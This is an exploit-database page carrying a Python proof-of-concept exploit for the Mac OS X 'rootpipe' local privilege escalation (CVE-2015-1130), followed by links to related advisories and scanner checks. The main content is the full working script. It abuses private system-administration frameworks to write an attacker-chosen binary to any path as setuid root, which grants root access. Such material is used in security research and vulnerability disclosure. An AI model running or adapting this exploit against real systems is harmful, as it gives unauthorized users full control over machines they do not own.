Lucene search
Emil Kvarnhammar1337DAY-ID-23491HistoryApr 09, 2015 - 12:00 a.m.
Mac OS X rootpipe Local Privilege Escalation Exploit
2015-04-0900:00:00
Emil Kvarnhammar
0day.today
40
0.0005 Low
EPSS
Percentile
14.6%
Mac OS X rootpipe local proof of concept privilege escalation exploit.
########################################################
#
# PoC exploit code for rootpipe (CVE-2015-1130)
#
# Created by Emil Kvarnhammar, TrueSec
#
# Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2
#
########################################################
import os
import sys
import platform
import re
import ctypes
import objc
import sys
from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions
from Foundation import NSAutoreleasePool
def load_lib(append_path):
return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path);
def use_old_api():
return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0])
args = sys.argv
if len(args) != 3:
print "usage: exploit.py source_binary dest_binary_as_root"
sys.exit(-1)
source_binary = args[1]
dest_binary = os.path.realpath(args[2])
if not os.path.exists(source_binary):
raise Exception("file does not exist!")
pool = NSAutoreleasePool.alloc().init()
attr = NSMutableDictionary.alloc().init()
attr.setValue_forKey_(04777, NSFilePosixPermissions)
data = NSData.alloc().initWithContentsOfFile_(source_binary)
print "will write file", dest_binary
if use_old_api():
adm_lib = load_lib("/Admin.framework/Admin")
Authenticator = objc.lookUpClass("Authenticator")
ToolLiaison = objc.lookUpClass("ToolLiaison")
SFAuthorization = objc.lookUpClass("SFAuthorization")
authent = Authenticator.sharedAuthenticator()
authref = SFAuthorization.authorization()
# authref with value nil is not accepted on OS X <= 10.8
authent.authenticateUsingAuthorizationSync_(authref)
st = ToolLiaison.sharedToolLiaison()
tool = st.tool()
tool.createFileWithContents_path_attributes_(data, dest_binary, attr)
else:
adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration")
WriteConfigClient = objc.lookUpClass("WriteConfigClient")
client = WriteConfigClient.sharedClient()
client.authenticateUsingAuthorizationSync_(None)
tool = client.remoteProxy()
tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)
print "Done!"
del pool
# 0day.today [2018-03-12] #Related
seebug
seebug
Mac OS X < 10.7.5, 10.8.2, 10.9.5 10.10.2 - rootpipe 本地提权漏洞
2015-09-10 00:00:00
saint
saint
OS X rootpipe privilege elevation
2015-04-14 00:00:00
OS X rootpipe privilege elevation
2015-04-14 00:00:00
OS X rootpipe privilege elevation
2015-04-14 00:00:00
metasploit
metasploit
Apple OS X Rootpipe Privilege Escalation
2015-04-10 16:22:00
zdt
zdt
Mac OS X Rootpipe Privilege Escalation Exploit
2015-04-12 00:00:00
attackerkb
attackerkb
CVE-2015-1130
2015-04-10 00:00:00
packetstorm
packetstorm
Mac OS X rootpipe Local Privilege Escalation
2015-04-09 00:00:00
Mac OS X Rootpipe Privilege Escalation
2015-04-10 00:00:00
prion
prion
Authentication flaw
2015-04-10 14:59:00
exploitpack
exploitpack
canvas
canvas
Immunity Canvas: ROOTPIPE
2015-04-10 14:59:00
thn
thn
Apple Failed to Patch Rootpipe Mac OS X Yosemite Vulnerability
2015-04-20 23:31:00
cisa_kev
cisa_kev
Apple OS X Authentication Bypass Vulnerability
2022-02-10 00:00:00
cve
cve
CVE-2015-1130
2015-04-10 14:59:00
exploitdb
exploitdb
cisa
cisa
CISA Adds 15 Known Exploited Vulnerabilities to Catalog
2022-02-10 00:00:00
openvas
openvas
Apple Mac OS X Multiple Vulnerabilities-01 (Apr 2015)
2015-04-24 00:00:00
securityvulns
securityvulns
Apple Mac OS X multiple security vulnerabilities
2015-04-13 00:00:00
APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004
2015-04-09 00:00:00
nessus
nessus
Mac OS X 10.10.x < 10.10.3 Multiple Vulnerabilities (FREAK)
2015-04-10 00:00:00